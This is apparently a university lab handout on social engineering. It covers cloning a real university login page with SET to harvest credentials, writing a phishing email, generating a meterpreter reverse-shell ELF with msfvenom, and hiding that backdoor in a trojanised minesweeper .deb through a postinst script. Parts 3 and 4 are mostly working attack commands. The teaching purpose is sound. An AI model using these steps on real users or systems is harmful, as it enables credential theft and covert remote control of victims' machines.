Lab 8 - Social Engineering
Table of Contents
"The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly." - https://github.com/trustedsec/social-engineer-toolkit
Note: A key selling point of many SET features is that you can get an attack for testing and demonstration purposes very quickly. Are they believable? Well..... Let's just say additional effort is required to go from script kiddie level to an attack with a real chance of success, and that would be accomplished by other tools (and custom tools), not by using the SET software.
So, with the understanding that SET is more for "fun demos", let's go!
Activities
Part 1 - Credential Harvesting via Site Cloner
Run the Social-Engineer Toolkit
$ sudo setoolkit XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX XX
XX MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM XX
XX MMMMMMMMMMMMMMMMMMMMMssssssssssssssssssssssssssMMMMMMMMMMMMMMMMMMMMM XX
XX MMMMMMMMMMMMMMMMss''' '''ssMMMMMMMMMMMMMMMM XX
XX MMMMMMMMMMMMyy'' ''yyMMMMMMMMMMMM XX
XX MMMMMMMMyy'' ''yyMMMMMMMM XX
XX MMMMMy'' ''yMMMMM XX
XX MMMy' 'yMMM XX
XX Mh' 'hM XX
XX - - XX
XX XX
XX :: :: XX
XX MMhh. ..hhhhhh.. ..hhhhhh.. .hhMM XX
XX MMMMMh ..hhMMMMMMMMMMhh. .hhMMMMMMMMMMhh.. hMMMMM XX
XX ---MMM .hMMMMdd:::dMMMMMMMhh.. ..hhMMMMMMMd:::ddMMMMh. MMM--- XX
XX MMMMMM MMmm'' 'mmMMMMMMMMyy. .yyMMMMMMMMmm' ''mmMM MMMMMM XX
XX ---mMM '' 'mmMMMMMMMM MMMMMMMMmm' '' MMm--- XX
XX yyyym' . 'mMMMMm' 'mMMMMm' . 'myyyy XX
XX mm'' .y' ..yyyyy.. '''' '''' ..yyyyy.. 'y. ''mm XX
XX MN .sMMMMMMMMMss. . . .ssMMMMMMMMMs. NM XX
XX N` MMMMMMMMMMMMMN M M NMMMMMMMMMMMMM `N XX
XX + .sMNNNNNMMMMMN+ `N N` +NMMMMMNNNNNMs. + XX
XX o+++ ++++Mo M M oM++++ +++o XX
XX oo oo XX
XX oM oo oo Mo XX
XX oMMo M M oMMo XX
XX +MMMM s s MMMM+ XX
XX +MMMMM+ +++NNNN+ +NNNN+++ +MMMMM+ XX
XX +MMMMMMM+ ++NNMMMMMMMMN+ +NMMMMMMMMNN++ +MMMMMMM+ XX
XX MMMMMMMMMNN+++NNMMMMMMMMMMMMMMNNNNMMMMMMMMMMMMMMNN+++NNMMMMMMMMM XX
XX yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy XX
XX m yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy m XX
XX MMm yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy mMM XX
XX MMMm .yyMMMMMMMMMMMMMMMM MMMMMMMMMM MMMMMMMMMMMMMMMMyy. mMMM XX
XX MMMMd ''''hhhhh odddo obbbo hhhh'''' dMMMM XX
XX MMMMMd 'hMMMMMMMMMMddddddMMMMMMMMMMh' dMMMMM XX
XX MMMMMMd 'hMMMMMMMMMMMMMMMMMMMMMMh' dMMMMMM XX
XX MMMMMMM- ''ddMMMMMMMMMMMMMMdd'' -MMMMMMM XX
XX MMMMMMMM '::dddddddd::' MMMMMMMM XX
XX MMMMMMMM- -MMMMMMMM XX
XX MMMMMMMMM MMMMMMMMM XX
XX MMMMMMMMMy yMMMMMMMMM XX
XX MMMMMMMMMMy. .yMMMMMMMMMM XX
XX MMMMMMMMMMMMy. .yMMMMMMMMMMMM XX
XX MMMMMMMMMMMMMMy. .yMMMMMMMMMMMMMM XX
XX MMMMMMMMMMMMMMMMs. .sMMMMMMMMMMMMMMMM XX
XX MMMMMMMMMMMMMMMMMMss. .... .ssMMMMMMMMMMMMMMMMMM XX
XX MMMMMMMMMMMMMMMMMMMMNo oNNNNo oNMMMMMMMMMMMMMMMMMMMM XX
XX XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
.o88o. o8o .
888 `" `"' .o8
o888oo .oooo.o .ooooo. .ooooo. oooo .ooooo. .o888oo oooo ooo
888 d88( "8 d88' `88b d88' `"Y8 `888 d88' `88b 888 `88. .8'
888 `"Y88b. 888 888 888 888 888ooo888 888 `88..8'
888 o. )88b 888 888 888 .o8 888 888 .o 888 . `888'
o888o 8""888P' `Y8bod8P' `Y8bod8P' o888o `Y8bod8P' "888" d8'
.o...P'
`XER0'
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 8.0.3
Codename: 'Maverick'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> Select the desired mode of operation:
set> 1 # For "Social-Engineering Attacks"
set> 2 # For "Website Attack Vectors"
set:webattack> 3 # For "Credential Harvester Attack"
set:webattack> 2 # For "Site Cloner"The Credential Harvester method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
Enter the IP address that you want the stolen credentials to be sent to. The default IP here is probably fine - it's the IP of your Kali box running SET.
set:webattack> aaa.bbb.ccc.dddEnter the website that you wish to clone
set:webattack> https://cas.pacific.edu/cas/loginLaunch the web browser in Kali and visit your cloned page at http://aaa.bbb.ccc.ddd
Enter a fake username and password, and confirm that you see those credentials in the SET console.
Note that the cloned website redirects to the real login page after swiping the credentials.
The user just assumes they entered the wrong login and tries again. Will they be suspicious? How many times have you entered a wrong password?
Deliverables:
- Upload the XML report that SET produces with all the stolen credentials. You'll need to stop the collection process via CTRL-C.
Tip: The Social Engineering Toolkit is run as the root user so it has the proper network access. However, this means all the files it creates are owned by the root user and saved in the root user's home directory. Use this command to copy the "reports" folder it generates back to your home directory and change the file owner and group to be your username instead of the root user.
$ sudo cp -R /root/.set/reports ~ && sudo chown -R $USER:$USER ~/reports
While this is a fun example, the out-of-the-box SET experience is not particularly convincing. There are a number of issues.
Deliverables:
- Issue 1: Look at the URL of your cloned site:
http://aaa.bbb.ccc.ddd. Is that IP address suitable for a real social engineering attack out across the Internet? Try accessing it from your phone if you're unsure. Why doesn't it work? (See: Background reading) - Issue 1 (continued): How might you solve the IP address issue in the previous question?
- Issue 2: Look at the URL of your cloned site again:
http://aaa.bbb.ccc.ddd. An ugly IP address. Even 25% of moms would notice that looks suspicious or unusual. How could you remedy this problem? - Issue 3: Look at the URL of your cloned site again:
http://aaa.bbb.ccc.ddd. HTTP. That's not encrypted. Web browsers are increasingly assertive with labeling such pages as not secure with a variety of warning labels or icons. Maybe 15% of moms would notice that. How could you solve this problem? (And, even better, solve this problem for a cost of $0.00?)
Part 2 - Email Blast
Let's say we have the cloned credential harvesting site, and it's doing a credible job masquerading as a legitimate site (after addressing issues 1-3 above with reasonable solutions). How do we get victims (er, client employees who we have explicit written permission to test) to visit our site? Let's send them an email and bait them to click it.
The Social-Engineer Toolkit has a "Mass Mailer" module where it can send out emails of your own design. Actually using this module (or any other mass mailing program) effectively, however, is a challenge. What you would love to do is generate fake emails coming from ceo@company.com or tech-support@company.com, but you'll quickly run into the same kinds of technological filtering and restrictions used to inhibit spammers.
One such anti-spam technology is Sender Policy Framework (SPF).
Deliverables:
- Describe SPF, in your own words. (1 paragraph)
- Using any number of available websites, generate a SPF rule for the domain
company.com, specifying that IP address123.45.67.89is allowed to send email for this domain, and also that hostgmail.comis also allowed to send email for this domain. Note: There are other more-detailed SPF options. I don't care how you set them.
As an example, the SPF rule for
pacific.eduisv=spf1 ip4:138.9.110.0/25 ip4:208.117.48.237 ip4:176.31.145.254 include:spf.protection.outlook.com ....(more hosts).... ~all
Another such anti-spam technology is DomainKeys Identified Mail (DKIM).
Deliverables:
- Describe DKIM, in your own words. (1 paragraph)
Finally, Domain-based Message Authentication, Reporting, and Conformance (DMARC) is a third anti-spam technology closely related to the first two.
Deliverables:
- Describe DMARC, in your own words. (1 paragraph)
Note that none of these systems are guarantees. The receiver of an email could choose to disregard these systems and deliver a fraudulent message anyway. Or, more likely, the receiver uses information from these systems as data points in a larger anti-spam system that examines the content of the message, the reputation of the server sending the email, the user history in flagging previous messages as spam, and proprietary trade secrets built on decades of experience, when deciding whether to deliver the message to a user inbox. Even new legitimate senders have significant challenges in reliably delivering emails to @gmail.com, @outlook.com, and other large mail services.
Because of these challenges, you'll often see phishing attacks coming from ceo@fakecompany.com, or ceo-fakecompany@gmail.com, or ceo@company.fake.com, as those are more likely to be delivered. Of course, if you have already have some access to the corporate network after earlier pen testing activities, you could send emails out using the legitimate corporate email server. But that's a chicken and egg problem - often times you're using social engineering attacks to gain initial access to the network.
Deliverables:
- Using your own personal email, create a high quality phishing email that would plausibly induce a "typical university student" to click on a link and take some action. Send it to yourself to ensure it's correctly formatted. Then, save the email as a .eml or .html file and attach it here. In gmail, the "download message" feature under the ". . ." icon will do this. Other mail clients have an export or save-as feature.
Part 3 - Payloads via msfvenom
Metasploit includes a tool - msfvenom - that can package Metasploit exploits into stand-alone executables that a user can be tricked into running via a social engineering attack.
To see a list of all available payloads, do:
$ msfvenom --list payloadsIt's a long list, and the same list of available payloads that Metasploit normally has available to run after an exploit. Just, this time no exploit is needed, since we're using social engineering to trick the user into running the payload.
To see a list of available output formats, CPU architectures, and platforms, do:
$ msfvenom --list formats
$ msfvenom --list archs
$ msfvenom --list platformsMake an executable that is runnable on our Metasploitable2 VM, a Linux host. That would be the .elf file type. (Windows would be .exe). Pick a payload from the list that works on Linux, and ask msfvenom to package it for you and save it to /tmp/LegitProgram. This payload is hardwired to connect back to the LHOST IP address, which should be Kali's IP:
$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \
--arch x86 \
--format elf \
--platform linux \
--out /tmp/LegitProgram \
LHOST=aaa.bbb.ccc.ddd \
LPORT=5678Tip 1: For clarity, this long command was split into multiple lines with the Bash "line continuation" character \. Keep that character in if you enter the multi-line command, or omit it if you enter the command as a single line.
Tip 2: Did your console fill up with "gibberish" when you ran this? Then you didn't correctly redirect the output (using >) to the file /tmp/LegitProgram, and thus msfvenom output the executable file to standard output instead.
Change to the /tmp directory, and start a simple webserver in Kali to host this "LegitProgram" binary. We're using this as a way to get the binary on the target machine since we're in control of both sides, but in reality this would be accomplished through some social engineering attack.
$ cd /tmp
$ python2 -m SimpleHTTPServer 8888 # Built-in webserver in Python 2
# python3 -m http.server 8888 # Alternate command: Built-in webserver in Python 3Over on your Metasploitable2 VM, download the file from the webserver running in the Kali VM:
$ wget aaa.bbb.ccc.dddd:8888/LegitProgramWarning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named LegitProgram.1, LegitiProgram.2, etc, as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.
At this point, you can CTRL-C on the webserver, we don't need it any more.
Run metasploit
$ sudo service postgresql start
$ msfconsoleUse the generic payload handler that provides Metasploit features to exploits run outside of the framework. Configure it for the payload you just downloaded on the target VM, as it needs to know
- What payload is incoming
- What IP the payload is connecting to, and
- What port the payload is connecting to.
msf6> use exploit/multi/handler
msf6> set PAYLOAD linux/x86/meterpreter_reverse_tcp
msf6> set LHOST aaa.bbb.ccc.ddd
msf6> set LPORT 5678
msf6> set ExitOnSession falseRun this service in the background as a job.
msf6> exploit -jNow, over in the Metasploitable2 VM, run the payload.
$ chmod +x LegitProgram # Needs to be marked as executable
$ ./LegitProgramBack in Kali, you should see a notice that a new session was opened.
[*] Meterpreter session 1 opened (172.16.196.2:5678 -> 172.16.196.4:33423) at 2021-02-07 00:20:41 -0800
msf6> sessions --list
msf6> sessions -i X # where X = number of Meterpreter sessionDeliverables:
- Submit a screenshot of your Kali msfconsole showing an active meterpreter session
- Submit a screenshot of your Kali meterpreter showing the output of "sysinfo"
- Submit a screenshot of your Metasploitable2 VM console showing the "LegitProgram" running.
In Kali, you can quit the Meterpreter session with the quit command. In addition, you can view the listening handler with jobs and then kill that listener with kill # (where # is the job ID number)
Part 4 - Payload Obfuscation
Rather than coax the user into running a program that is exclusively a back door (which might make them suspicious), what if the backdoor is bundled with some legitimate program? Let's build an Linux installer package (.deb file) for the minesweeper game "freesweep", but include an extra surprise in the bundle.
Based off of this tutorial, but with bugfixes. :) https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/
First, on Kali, download the legitimate .deb file from the package manager. Since we're going to run this on the OLD Metasploitable2 VM (32-bit), let's just grab the correct binary out of the Ubuntu archives. That way, the dynamic library dependencies will work out OK.
$ mkdir -p /tmp/working
$ cd /tmp/working
$ wget http://old-releases.ubuntu.com/ubuntu/pool/universe/f/freesweep/freesweep_0.88-4.3_i386.debSecond, extract the files into that working directory
$ dpkg -x freesweep_0.88-4.3_i386.deb packageThird, add a DEBIAN directory to contain the "extra surprise" we are included in this package
$ mkdir /tmp/working/package/DEBIANIn the DEBIAN directory, create a new file called control with the following contents:
$ nano /tmp/working/package/DEBIAN/controlPackage: freesweep
Version: 0.88-4.3
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.In the DEBIAN directory, create a post-installation script called postinst with the following commands that
- Change the permissions of the innocently-named "freesweep_scores" to include the execute flag
- Run the innocently-named "freesweep_scores", and
- Run the legitimate freesweep program
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweepMake this script executable
$ chmod +x /tmp/working/package/DEBIAN/postinstNow, generate our backdoor program "freesweep_scores":
$ msfvenom --payload linux/x86/meterpreter_reverse_tcp \
--arch x86 \
--format elf \
--platform linux \
LHOST=aaa.bbb.ccc.ddd \
LPORT=5678 \
--out /tmp/working/package/usr/games/freesweep_scoresFinally, build the new .deb file with the backdoor program:
$ cd /tmp/working/package/DEBIAN
$ dpkg-deb -Zgzip --build /tmp/working/package
# -Zgzip is needed because Metasploitable2 OS is much older than Kali's, and
# package manager doesn't know how to uncompress newer .deb filesRename the output back into the original freesweep.deb file name (no one suspects a thing!), and move it to /tmp
$ mv /tmp/working/package.deb /tmp/freesweep.deb
$ cd /tmpAs you did in the previous section: Run the web server and copy the new freesweep.deb to your Metasploitable2 VM with wget.
Warning: If you have to re-run this wget command for any reason and leave the original file in place, the next file will be named freesweep.deb.1, freesweep.deb.2, etc, as shown in the wget output. Either delete the older copy prior to running wget again, or make a note of what the most recent file name is.
As you did in the previous section: Run Metasploit and launch the exploit/multi/handler with the correct options to listen for an incoming connection. Or, if msfconsole is still active, the hander may be still running.
On the Metasploitable2 VM, install this super fun game your friend sent you!
$ sudo dpkg -i freesweep.deb
# Oh look, the game started automatically!
# Let's play, this looks fun! On Kali, view the active sessions
msf6> sessions --list
msf6> sessions -i x
meterpreter> sysinfoTroubleshooting:
Did something go wrong in your steps? To clear out metasploitable2 and start again:
$ sudo apt-get remove freesweep
$ rm freesweep.deb
# And download a fixed .deb file and try installing it againYou can verify that your copy of freesweep.deb contains your backdoor program with dpkg -c freesweep.deb.
Deliverables:
- Submit a screenshot of Metasploitable2 showing the game running
- Submit a screenshot of Kali showing the active meterpreter session
- What is the md5 checksum of the original freesweep
.debfile downloaded from the repository? Use themd5sumcommand - What is the md5 checksum of the modified
freesweep.debfile that also includes the backdoor program "freesweep_scores"? Use themd5sumcommand